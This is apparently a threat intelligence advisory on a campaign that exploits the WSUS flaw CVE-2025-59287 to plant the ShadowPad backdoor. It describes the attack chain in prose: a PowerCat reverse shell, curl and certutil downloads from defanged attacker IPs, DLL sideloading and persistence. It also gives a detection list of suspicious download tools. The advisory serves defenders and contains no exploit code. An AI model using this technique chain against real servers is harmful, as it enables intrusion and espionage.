ShadowPad Propagation via Exploitation of WSUS RCE Flaw

In November 2025, ASEC uncovered an advanced cyberattack campaign that exploited a severe vulnerability in Microsoft Windows Server Update Services (WSUS) – tracked as CVE-2025-59287. The attacks deploy ShadowPad, a highly modular and stealthy malware tool associated with Chinese state-sponsored APT groups.

Severity: High

Threat Details

• Vulnerability: CVE-2025-59287 (CVSS Score: 9.8) is an unsafe deserialization flaw in WSUS. It allows an unauthenticated, remote attacker to execute arbitrary code with the highest privileges (SYSTEM) by sending specially crafted data over the network to the WSUS service ports (8530/8531).
• Initial Access: The threat actor exploited the CVE-2025-59287 vulnerability on Windows Servers with the WSUS Server Role enabled.
• Foothold: After exploitation, the attackers used the RCE to download and execute PowerCat (an open-source PowerShell-based Netcat utility) to establish a reverse system command shell on the victim server.
• Malware Payload: The main payload is ShadowPad, a modular backdoor and Remote Access Trojan (RAT) commonly associated with Chinese APT groups like APT41, APT23, and Tonto Team. It is a closed-source malware-as-a-service platform for espionage.
• Installation Method: The attackers re-used the RCE vulnerability to execute legitimate Windows utilities, specifically curl.exe and certutil.exe, to download, decode, and install the ShadowPad components from a remote server (e.g., 149.28.78[.]189:42306).
• Execution: ShadowPad achieves execution and persistence through DLL Sideloading, using a legitimate executable (ETDCtrlHelper.exe) to load its malicious DLL (ETDApix.dll). The core functionality is contained in an encrypted data file (0C137A80.tmp).
• Post-Compromise: The malware establishes persistence using a service name/mutex (Q-X64) and a Task Scheduler entry. The primary Command and Control (C&C) server addresses are configured to communicate over both HTTP and HTTPS (e.g., 163.61.102[.]245:443).
• Risk Implication: Since WSUS is a core enterprise patching component, a successful compromise not only grants the attackers SYSTEM-level control over the server but also poses a potential supply-chain threat if the actor were to distribute malicious updates to all downstream client machines managed by that WSUS server.

Recommendations

1. Immediately apply Microsoft’s patch for CVE-2025-59287 to all WSUS-enabled systems.
2. Ensure only Microsoft Update servers can access WSUS. Consider blocking inbound traffic on TCP ports 8530 and 8531 for all other sources.
3. Actively monitor and alert on the execution of suspicious processes originating from the WSUS service parent processes (w3wp.exe or wsusservice.exe), particularly:
   • powershell.exe (especially when using encoded commands or downloading files via IEX or DownloadString)
   • certutil.exe (used for decoding and downloading files)
   • curl.exe or wget (used for downloading external content)
   • PowerCat commands or signatures
4. Block the IOCs at their respective controls
   https://www.virustotal.com/gui/collection/877dbd9912a95692315eaf7d283060a04f1e8a186b870f340707a84d06db0026/iocs

Source:

• https://asec.ahnlab.com/en/91166/

Enjoyed reading this Threat Intelligence Advisory? Stay updated with our latest exclusive content by following us on Twitter and LinkedIn

No related posts found.